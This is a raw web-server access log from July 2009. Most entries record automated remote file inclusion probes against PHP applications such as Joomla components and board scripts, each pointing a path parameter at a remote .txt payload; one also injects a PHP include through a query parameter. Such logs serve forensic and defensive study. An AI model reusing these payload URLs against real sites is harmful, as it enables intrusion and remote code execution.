74.63.91.170 - - [12/Jul/2009:02:59:01 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://www.atu.bz/ram/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.236.242.164 - - [12/Jul/2009:02:59:35 -0400] "GET /logs/error_log.Q109061500//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.comune-paradiso.ch/mambo//cmss/yes.txt??%0D?? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
222.236.47.192 - - [12/Jul/2009:02:59:37 -0400] "GET /logs/access_log.Q109051300//bbs//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:02:59:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.236.242.164 - - [12/Jul/2009:02:59:53 -0400] "GET /logs/error_log.Q109061500//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.comune-paradiso.ch/mambo//cmss/yes.txt??%0D?? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
89.223.3.98 - - [12/Jul/2009:02:59:53 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:02:59:53 -0400] "GET /logs/access_log.Q109061800/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:02:59:53 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:02:59:53 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:02:59:53 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:02:59:53 -0400] "GET /logs/access_log.Q109061800/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:00:02 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:00:02 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:00:02 -0400] "GET /logs/access_log.Q109061800%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:00:02 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:00:02 -0400] "GET /logs/access_log.Q109061800%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:00:03 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
65.55.105.234 - - [12/Jul/2009:03:00:07 -0400] "GET /logs/access_log.Q109022000 HTTP/1.1" 404 224 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
220.231.126.252 - - [12/Jul/2009:03:00:10 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:03:00:10 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:03:00:10 -0400] "GET /logs/access_log.Q109051700//bbs//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
121.124.127.34 - - [12/Jul/2009:03:00:47 -0400] "GET /logs/access_log.Q109051700%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
121.124.127.34 - - [12/Jul/2009:03:01:07 -0400] "GET /logs/access_log.Q109051700%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:01:49 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:01:49 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:01:49 -0400] "GET /logs/access_log.Q109061800/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
121.124.127.34 - - [12/Jul/2009:03:03:00 -0400] "GET /logs/error_log.Q109061000%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
121.124.127.34 - - [12/Jul/2009:03:03:01 -0400] "GET /logs/error_log.Q109061000%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:03:08 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:03:08 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:03:08 -0400] "GET /logs/access_log.Q109061800/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:03:18 -0400] "GET /logs/access_log.Q109062800%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:03:20 -0400] "GET /logs/access_log.Q109062800%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:03:24 -0400] "GET /logs/access_log.Q109062800/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:04:08 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:04:08 -0400] "GET /logs/access_log.Q109061800/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:04:08 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:04:11 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:04:11 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:04:11 -0400] "GET /logs/access_log.Q109061800/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:04:42 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:04:42 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:04:43 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:04:43 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:04:43 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:04:43 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:03:04:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.223.3.98 - - [12/Jul/2009:03:05:01 -0400] "GET /logs/access_log.Q109062800/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:05:26 -0400] "GET /logs/access_log.Q109062300/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:05:29 -0400] "GET /logs/access_log.Q109062300/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:05:32 -0400] "GET /logs/access_log.Q109062800/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:05:38 -0400] "GET /logs/access_log.Q109062800/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
218.145.31.242 - - [12/Jul/2009:03:05:51 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
218.145.31.242 - - [12/Jul/2009:03:05:51 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
218.145.31.242 - - [12/Jul/2009:03:05:51 -0400] "GET /logs/access_log.Q109062900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
218.145.31.242 - - [12/Jul/2009:03:06:18 -0400] "GET /logs/access_log.Q109051500//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.236.47.192 - - [12/Jul/2009:03:06:24 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
222.236.47.192 - - [12/Jul/2009:03:06:24 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.236.47.192 - - [12/Jul/2009:03:06:24 -0400] "GET /logs/access_log.Q109051700//bbs//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
218.145.31.242 - - [12/Jul/2009:03:06:39 -0400] "GET /logs/access_log.Q109062900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
218.145.31.242 - - [12/Jul/2009:03:06:39 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
218.145.31.242 - - [12/Jul/2009:03:06:39 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
218.145.31.242 - - [12/Jul/2009:03:07:07 -0400] "GET /logs/access_log.Q109051500//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://dfpyvu.mxl.uabc.mx/trash/tukulid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
89.223.3.98 - - [12/Jul/2009:03:07:10 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:07:12 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
65.38.210.157 - - [12/Jul/2009:03:07:20 -0400] "GET /logs/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.803"
65.38.210.157 - - [12/Jul/2009:03:07:20 -0400] "GET /logs/access_log.Q109070800/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.803"
65.38.210.157 - - [12/Jul/2009:03:07:20 -0400] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
65.38.210.157 - - [12/Jul/2009:03:07:20 -0400] "GET /logs/access_log.Q109070400/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.803"
89.223.3.98 - - [12/Jul/2009:03:07:22 -0400] "GET /logs/access_log.Q109062300%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
222.236.47.192 - - [12/Jul/2009:03:07:23 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.236.47.192 - - [12/Jul/2009:03:07:23 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
222.236.47.192 - - [12/Jul/2009:03:07:24 -0400] "GET /logs/access_log.Q109051700//bbs//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:07:30 -0400] "GET /logs/access_log.Q109062300%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
124.0.145.1 - - [12/Jul/2009:03:07:44 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
124.0.145.1 - - [12/Jul/2009:03:07:44 -0400] "GET /logs/access_log.Q109053100///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
124.0.145.1 - - [12/Jul/2009:03:07:44 -0400] "GET /logs/access_log.Q109051600///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
124.0.145.1 - - [12/Jul/2009:03:07:44 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 200 9196 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:07:54 -0400] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:07:54 -0400] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:07:54 -0400] "GET /logs/error_log.Q109061700%20%20/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:07:55 -0400] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:07:55 -0400] "GET /logs/error_log.Q109061700%20%20/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:07:55 -0400] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:08:00 -0400] "GET /logs/access_log.Q109053000%20%20/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
89.223.3.98 - - [12/Jul/2009:03:08:02 -0400] "GET /logs/access_log.Q109053000%20%20/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
222.236.47.192 - - [12/Jul/2009:03:08:06 -0400] "GET /logs/access_log.Q109051500//bbs//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
222.236.47.192 - - [12/Jul/2009:03:08:43 -0400] "GET /logs/access_log.Q109051300//bbs//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
66.249.68.70 - - [12/Jul/2009:03:09:10 -0400] "GET /images/ACE_RCF_RCT_sellsheet.pdf HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.70 - - [12/Jul/2009:03:09:24 -0400] "GET /images/items/9800045_thumb.jpg HTTP/1.1" 200 1541 "-" "Googlebot-Image/1.0"
220.231.126.252 - - [12/Jul/2009:03:09:31 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:03:09:31 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:03:09:31 -0400] "GET /logs/access_log.Q109051700//bbs//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:03:09:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.124.127.34 - - [12/Jul/2009:03:10:44 -0400] "GET /logs/access_log.Q109051500//bbs//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
222.236.47.192 - - [12/Jul/2009:03:10:45 -0400] "GET /logs/access_log.Q109051500//bbs//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
121.124.127.34 - - [12/Jul/2009:03:11:00 -0400] "GET /logs/access_log.Q109051500//bbs//skin/ggambo7002_board/write.php?dir=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
222.236.47.192 - - [12/Jul/2009:03:11:07 -0400] "GET /logs/access_log.Q109051300//bbs//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:03:11:39 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:03:11:39 -0400] "GET /logs/access_log.Q109051700//bbs//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:03:11:39 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
147.123.157.1 - - [12/Jul/2009:03:13:14 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
147.123.157.1 - - [12/Jul/2009:03:13:14 -0400] "GET /logs/access_log.Q109061200///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
147.123.157.1 - - [12/Jul/2009:03:13:14 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 200 9196 "-" "Mozilla/5.0"
66.249.68.247 - - [12/Jul/2009:03:13:35 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0193194E989350008F31059+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
147.123.157.1 - - [12/Jul/2009:03:14:06 -0400] "GET /logs/error_log.Q109061200///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
195.36.6.200 - - [12/Jul/2009:03:14:24 -0400] "GET /logs/access_log.Q109061800/xmlrpc.php? HTTP/1.1" 404 235 "-" "libwww-perl/5.823"
195.36.6.200 - - [12/Jul/2009:03:14:25 -0400] "GET /xmlrpc.php? HTTP/1.1" 404 208 "-" "libwww-perl/5.823"
195.36.6.200 - - [12/Jul/2009:03:14:25 -0400] "GET /logs/xmlrpc.php? HTTP/1.1" 404 213 "-" "libwww-perl/5.823"
132.247.253.86 - - [12/Jul/2009:03:14:34 -0400] "GET /logs/access_log.Q109061800/xmlrpc.php? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
132.247.253.86 - - [12/Jul/2009:03:14:34 -0400] "GET /xmlrpc.php? HTTP/1.1" 404 208 "-" "libwww-perl/5.808"
132.247.253.86 - - [12/Jul/2009:03:14:35 -0400] "GET /logs/xmlrpc.php? HTTP/1.1" 404 213 "-" "libwww-perl/5.808"
209.59.12.99 - - [12/Jul/2009:03:14:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.210.70.13 - - [12/Jul/2009:03:14:54 -0400] "GET /logs/access_log.Q109061800/xmlrpc.php? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
195.210.70.13 - - [12/Jul/2009:03:14:56 -0400] "GET /xmlrpc.php? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
195.210.70.13 - - [12/Jul/2009:03:14:56 -0400] "GET /logs/xmlrpc.php? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
202.125.45.45 - - [12/Jul/2009:03:15:14 -0400] "GET /logs/access_log.Q109070400/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
